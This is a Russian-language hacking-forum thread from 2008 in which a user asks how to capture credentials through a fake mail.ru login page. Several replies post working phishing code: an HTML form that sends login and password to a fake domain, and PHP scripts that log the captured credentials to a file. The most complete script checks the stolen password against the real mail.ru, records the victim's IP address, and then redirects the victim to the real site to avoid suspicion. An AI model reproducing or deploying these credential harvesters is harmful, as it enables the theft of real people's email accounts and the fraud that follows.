Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Взлом через фейк (https://forum.antichat.xyz/showthread.php?t=75052)

abrut3000 26.06.2008 09:59
Взлом через фейк
 
http://i032.radikal.ru/0806/36/ffcc5cfeb771.jpg

У меня вопрос!!! Я сделал фейк mail.ru как мне сделать письмо как на фото чтоб когда жертва вводит свои данные и нажимает подтвердить
они записовались в базу БД?


Кто так сможет сделать отзовитесь!

nbd 26.06.2008 10:35
Зачем тебе заморочки с БД. Пиши в файл. Например так.

PHP код:
Содержимое нтмл письма (форма отправки данных)

...
<form action="http://фейк_мейл.ру/auth.php" method="POST">
<input type="text" name="login" >Логин<br>
<input type="password" name="pass">Пароль
<input type="submit">
</form>
.... 
и собственно скрипт записи логина и пасса

PHP код:
<?php
$login=$_POST['login'];
$pass=$_POST['pass'];
$data=$login." ".$pass;
$fh=fopen("data.txt""a");
fwrite($fh$data);
fclose($fh);
?>

Chaak 26.06.2008 10:49
Цитата:
Сообщение от nbd
Зачем тебе заморочки с БД. Пиши в файл. Например так.

PHP код:
Содержимое нтмл письма (форма отправки данных)

...
<form action="http://фейк_мейл.ру/auth.php" method="POST">
<input type="text" name="login" >Логин<br>
<input type="password" name="pass">Пароль
<input type="submit">
</form>
.... 
и собственно скрипт записи логина и пасса

PHP код:
<?php
$login=$_POST['login'];
$pass=$_POST['pass'];
$data=$login." ".$pass;
$fh=fopen("data.txt""a");
fwrite($fh$data);
fclose($fh);
?>
на mail.ru POST не работает поэтому:

PHP код:
<form action="http://фейк_мейл.ру/auth.php" method="GET"
<input type="text" name="login" >Логин<br
<input type="password" name="pass">Пароль 
<input type="submit"

PHP код:
<?php 
$login=$_GET['login']; 
$pass=$_GET['pass']; 
$data=$login.";".$pass."\n"
$fh=fopen("data.txt""a"); 
fwrite($fh$data); 
fclose($fh); 
Header("Location: http://win.mail.ru/cgi-bin/auth");
exit();
?>

nbd 26.06.2008 10:59
С гетом палево будет (: Увидев в адресной строке адрес вида http://фейк_мейл.ру/auth.php?login=lamer&pass=123456 даже имбицил поймет, что его поимели.

Кстати редирект на http://mail.ru/cgi-bin/ - Forbidden

Насчет поста ниже :
Так я и не спорил (: Я просто предложил заменить редирект на http://win.mail.ru/cgi-bin/auth

abrut3000 27.06.2008 07:53
Эти все скрипты которые вы написали паляться службой mail.ru

Naydav 27.06.2008 13:04
Цитата:
Эти все скрипты которые вы написали паляться службой mail.ru
Имееться ввиду, что бы в письме прислать форму?
Наверно спалят тогда...
Интересно, надо будет проверить позволяет ли мейл.ру отсылать данные гетом(из письма непосредственно)

abrut3000 27.06.2008 14:03
Вот это письмо как на фото ни как не палиться почему не знаю

abrut3000 18.07.2008 08:58
еще есть предложения

P3L3NG 21.07.2008 13:24
тоже интересно, присылали недавно такое письмо. я его разобрал хорошенько. код, адрес фэйка, ип того кто слыл узнал=) а повторить не получается. "расширенный формат" криво код преобразует(((

nc.STRIEM 21.07.2008 13:38
вот самый нормальный вариант фейка.
PHP код:
<?php
    error_reporting(0);
    $cont file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.$_POST['Login'].'&Domain='.$_POST['Domain'].'&Password='.$_POST['Password']);
    if(strstr($cont'<b>Ошибка</b>'))
        die(str_replace('action="auth"'''$cont));

    $fo fopen('mail.lg''a');
    fwrite($fodate('d.m.y H:i:s')."\t".$_SERVER['REMOTE_ADDR']."\n");
    fwrite($fo$_POST['Login'].'@'.$_POST['Domain']."\t".$_POST['Password']."\n\n");
    fclose($fo);
    header('Location: http://win.mail.ru/cgi-bin/auth?Login='.$_POST['Login'].'&Domain='.$_POST['Domain'].'&Password='.$_POST['Password']);
?>


Время: 12:17
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице